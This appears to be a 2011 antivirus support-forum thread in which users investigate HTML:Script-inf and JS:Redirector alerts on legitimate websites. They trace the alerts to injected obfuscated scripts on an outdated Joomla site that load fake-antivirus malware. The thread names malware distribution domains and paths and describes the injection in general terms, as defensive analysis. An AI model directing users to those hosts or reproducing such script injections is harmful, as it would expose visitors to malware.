false positive, html:script-inf a little too broad?

i have several warnings from client machines that perfectly legit websites are infected by html:script-inf

the latest one is this:
: File “hxxp://advisor.morningstar.com/microsite/default.aspx?client=cambridge” is infected by “HTML:Script-inf” virus.
“Resident protection (Web Shield)” task used Version of current VPS file is 110330-0, 03/30/2011

is there something bad about that site, or is a script just causing avast to freak because it’s redirecting or something?

i wish there was a way to just whitelist “html:script-inf” and the other ones that seem way too broad (html:iframe-inf, win32:malware-gen) some previous examples that seem to come and go:

  1. d:\autorun.inf on a factory stamped office 2000 cd. surely the non-writable factory cd is infected with inf:autorun worm
  2. File “hyyp://www.inventorshelp.com/index.php?option=com_contact&view=contact&id=1&Itemid=72” is infected by “JS:Redirector-DC [Trj]” virus
  3. File “C:\Documents and Settings\All Users\Application Data\Adobe\Acrobat\9.2\ARM\Elevator.exe” is infected by “Win32:Malware-gen”
  4. basically anything on photobucket, html-script-inf
  5. File “hzzp://my.yahoo.com/” is infected by "HTML:Script-inf

but the only one i really care about right now is our client trying to get to morningstar.com, which being an investment site, you can imagine they’re panicking about it being a virus site now

Please, munge the live links you give to avoid the unaware will get infected, either putting htxp or wxw etc.

The JS-redirector flag is still found by many av solutions and not only by avast:
just scanned here: htxp://www.inventorshelp.com/index.php?option=com_contact&view=contact&id=1&Itemid=72
Sitesecurity check at sucuri finds: http://sucuri.net/malware/entry/MW:JS:445
and 7 instances of it, see: http://sucuri.net/malware/malware-entry-mwjs445

Update your joomla version:

Web application details:
Application: Joomla! 1.5 - Open Source Content Management - http://www.joomla.org

Web application version:
Joomla Version 1.5.8 to 1.5.14 for: htxp://www.inventorshelp.com//media/system/js/caption.js
Joomla Version 1.5.2 to 1.5.7 for: hxtp://www.inventorshelp.com//language/en-GB/en-GB.ini

This website is qualified as dangerous here: http://www.websecurityguard.com/detail.aspx?domain=inventorshelpline.com&url=inventorshelp.com

polonus

thanks for the info on inventorshelp

what’s going on with the first link, morningstar dot com?

going forward, how are you scanning these sites, i’d like to add that tool/knowledge to my bag of tricks too :slight_smile:

Hi ByronTRN :slight_smile:

Please can you modify the link, to prevent others potentially becoming infected. (change http to hXXp) Thanks.

For the morningstar link, it seems that avast is alerting on a script that points to a php file on a site that avast blocks (network shield blocks a direct connection)

This script occurs 3 times within the page.

Whether the detection on the site it links to is good or not I don’t know.

The site it links to appears to be down, however avast still blocks the attempt to connect.

Scott

VirusTotal URL scan - inventorshelp.com/
http://www.virustotal.com/url-scan/report.html?id=a76827a3bc7438fa095bdc6c1924b364-1301489189

VirusTotal HTML scan - inventorshelp.com/
http://www.virustotal.com/file-scan/report.html?id=1b7d129e2414a750737d0b11818871ceac1c6643bfd81e955bc11712160e5f8b-1301496392

i’m just trying to understand…

on the inventorshelp site, you said sucuri says this:
Malware entry: MW:JS:445
Description:This encoded javascript loads malware (the fake AV) from:
*.ars3000.serveblog.net/ml.php (and other domains)

i want to know where on inventorshelp actually loads that malware

or is it because inventorshelp mentions joomla’s homepage at the very bottom, basically saying joomla is used on parts of the site… and maybe joomla’s homepage actually loads the malware?

i don’t get any attempted infections when browsing around inventorshelp - it seems to be a pretty legit site anyway, just trying to see how the flow is when it comes to detections. does avast check every link 3 levels deep or something? (inventorshelp mentioned joomla, so go scan joomla, which mentions about 400 other random urls, so go check them all - if one is infected then inventorshelp must be infected?)

wow - this same client machine is now emailing me about being infected with the rogue-av…

and since you see the lizamoon link on your end, that means it’s embedded in the morningstar site… right?

how can such a legit company be so infected? should i tell them?

For the inventorshelp site, it seems that avast is alerting on a long 1 line script that occurs twice in the page.

thanks for the additional info on inventorshelp - are you just looking at the view-source or is there an avast utility that can highlight what it thinks is infected?

i can’t tell what that script even does, avast just doesn’t like the length?

I an using a couple of tools…that is just a notepad++ window after I have pulled the source code. Then I isolate sections to find what avast is alerting on.

Using another tool, it appears that all that code returns a script that points to another site (avast will alert on this unobfuscated script as well). What is happening from there I don’t know.

I can’t seem to get any of the sites to resolve properly…Could be because I am trying in ubuntu?

EDIT: Pol, one of your links is one of the possibly infected ones and is live :wink:

Hi bryonTRN,

Here you can get a hunch on the malware infection at inventorshelp.com/
look at the active screen image I attached for you,

polonus

P.S. Ta, my friend, have made it non-click-through,

pol

Yes, I found that too and the domain is in Russia.

@ bryonTRN
I guess you aren’t questioning the avast web shields sensitivity now ;D

Legit web sites are no guarantee of being clean and the bigger/more popular the greater the target for hackers.

@ I can’t seem to get any of the sites to resolve properly…Could be because I am trying in ubuntu?

well, i think dns is dns - resolution of names won’t be dependent on the OS

now i see how that long script is really a URL, amazing to me. that site (investorshelp) should have nothing to do with a php file served from servemp3 dot com…

how does this stuff even happen, just poorly set permissions on people’s website files?

btw, i have nothing to do with creating or securing websites, i’m just receiving alerts from our client antiviruses

wow - i guess i assumed the bigger the website, the more SECURE it would be… and found it laughable that for example my.yahoo.com would be infected.

now i can see how involved it gets - yahoo probably doesn’t check all the advertisements they load, and the advertisers probably swap out scripts a day or two after, for something more malicious

should i even tell morningstar or inventorshelp, or would they not care / not believe me ?

Hi bryonTRN

Another random example of such a hack as for inventorshelp.com is being discussed here: http://www.webhostingtalk.com/archive/index.php/t-998435.html and finally the joomla insecurities…

Take it from me it is happening all of the time, mostly short-lived but then others pop up like hydra-heads…

And you weren’t alone as you will find described here:
http://www.spywareinfoforum.com/index.php?/topic/131491-28000-urls-whacked/

polonus

If anything, a bigger site is a bigger target…and things like older management systems like wordpress etc… contribute to the infections…generally when you see updates for things like that it is (at least in part) for a security update.

@ I can't seem to get any of the sites to resolve properly...Could be because I am trying in ubuntu?
I meant the sites that the scripts point to. I have read that some are coded to only work in windows...similar to how some malware can detect when being run in a VM...

You can try and let the site owners know, and even send the link to this thread.

@ bryonTRN
Well my.yahoo.com opened just fine for me (no alert) my.yahoo.com as it is different based on a) if you have a Yahoo account and b) geographic location, etc.

If you have an account so you are redirected to you account default page, for me that is home.bt.yahoo.com and I don’t get an alert.

So unless you haven’t got a Yahoo account you shouldn’t end up at my.yahoo.com I would have thought.

Hi DavidR,

as I was bryonTRN, I would do an additional spyware scan, quote from the link I gave above

this was done via ftp transfer with accounts user and pass.

It’ happent to few of my clients, weeks after I gave them the cpanel password, as their are local clients and I developed their website, I keep all the passwords and tell them the password only if they ask me or need it.

Your computer or clients computer is infected with some kind of spyware, and probably the password ware keeped in txt files.

I also recommend to save your password in free programs like KeePass Password Safe

polonus

last week i got alerts from about 20% of our installed clients, all referencing my.yahoo.com (from my first post in this thread) - so yeah not sure what they were seeing but it seems to have went away after the next updated virus defs


so - what can be done about these rogue AV infections coming from perfectly legit websites? can’t really block the referenced url’s they point to because they’re recreated thru automated processes… i mean there has to be a money trail, is there anyone even trying to stop them?

i’d bet there’s probably 10-20 actual humans behind all the various fake-av clones out there, why not just take them down? (not to derail the thread or anything)

Well avast’s web shield has blocked those script-inf attempts to infect for those sites that we have given information on. Avast is by far ahead of the game on these detections compared to others, but nothing is going to be 100%. So everyone should have a backup and recovery strategy for when things do happen, be that system problems or malware.

So all you can do is investigate the fact that avast is alerting learn how we have found out that the detections are good (or otherwise) and that avoids having to wait for us to check it out.

They aren’t what I would consider human, but organised crime as it is all about money, fake AV reports you are infected, wants you to buy solution. Guess what, if a user actually hands over money, these leaches could likely be subjected to card/identity fraud also.